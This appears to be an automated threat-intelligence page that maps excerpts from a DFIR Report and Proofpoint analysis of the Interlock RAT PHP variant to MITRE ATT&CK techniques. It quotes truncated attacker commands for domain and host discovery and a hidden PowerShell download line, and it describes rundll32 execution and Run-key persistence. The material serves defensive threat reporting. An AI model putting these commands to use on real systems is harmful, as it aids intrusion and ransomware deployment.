T1059.001 PowerShell (96%)
“…d into the run command it will execute a PowerShell script which eventually leads to Interlock RAT. Proofpoint researchers have observed both Interlock RAT Node.js and Interlock RAT PHP-based variants. The Interlock RAT PHP-based variant was first spotted in June 2025 campaign…”
T1059.003 Windows Command Shell (96%)
“"cmd.exe /s /c "tasklist" cmd.exe /s /c "nltest /dclist:" cmd.exe /s /c "whoami" cmd.exe /s /c "dir %%appdata%%" - Command and Control: The Interlock RAT establishes a robust command and control (C2) channel with the attackers’ infrastructure. Notab…”
T1018 Remote System Discovery (95%)
“cmd.exe /s /c "powershell -command "$searcher = New-Object DirectoryServices.DirectorySearcher '(&(objectCategory=computer))'; $searcher.PropertiesToLoad.Add('name') | Out-Null; $searcher.PropertiesToLoad.Add('description') | Out-Null; $…”
T1204.002 Malicious File (89%)
“KongTuke FileFix Leads to New Interlock RAT Variant. Researchers from The DFIR Report, in partnership with Proofpoint, have identified a new and resilient variant of the Interlock ransomware group’s remote access trojan (RAT)…”
T1021.001 Remote Desktop Protocol (88%)
“(.dll) and executes it using the Windows tool rundll32.exe. Autorun command: It sets itself up for persistence. The script adds an entry to the Windows registry's "Run" key. CMD command: It executes any shell command the attacker sends, giving them a remote command promp…”
T1059.001 PowerShell (84%)
“…fig (.cfg) file is passed as input. We created a PowerShell and Python script to parse the config which can be found here. "powershell.exe" -ep bypass -w h -c "schtasks /delete /tn updater /f; $w = New-Object System.Net.WebClient; $w.Headers.Add(\"user…”
T1087.002 Domain Account (74%)
“to gather and exfiltrate a comprehensive system profile as JSON data. The collected information includes detailed system specifications (systeminfo), a list of all running processes and associated services (tasklist), running Windows services (Get-Service), all mounted dr…”
T1564.003 Hidden Window (71%)
“Principal.WindowsBuiltInRole]::Administrator)) { 'admin' } else { 'user' }"" cmd.exe /s /c "powershell -c "tasklist /svc /fo csv | ConvertFrom-Csv | ConvertTo-Json"" cmd.exe /s /c "powershell -c "Get-Service | Select-Object -Property Name, Di…”
T1218.011 Rundll32 (61%)
“(.dll) and executes it using the Windows tool rundll32.exe. Autorun command: It sets itself up for persistence. The script adds an entry to the Windows registry's "Run" key. CMD command: It executes any shell command the attacker sends, giving them a remote command promp…”
T1204.004 Malicious Copy and Paste (46%)
“KongTuke FileFix Leads to New Interlock RAT Variant. Researchers from The DFIR Report, in partnership with Proofpoint, have identified a new and resilient variant of the Interlock ransomware group’s remote access trojan (RAT)…”
T1546.013 PowerShell Profile (33%)
“Principal.WindowsBuiltInRole]::Administrator)) { 'admin' } else { 'user' }"" cmd.exe /s /c "powershell -c "tasklist /svc /fo csv | ConvertFrom-Csv | ConvertTo-Json"" cmd.exe /s /c "powershell -c "Get-Service | Select-Object -Property Name, Di…”
Summary
Researchers from The DFIR Report, in partnership with Proofpoint, have identified a new and resilient variant of the Interlock ransomware group’s remote access trojan (RAT). This new malware, a shift from the previously identified JavaScript-based Interlock RAT (aka NodeSnake), uses PHP and is being used in a widespread campaign. Since May 2025, activity related to […]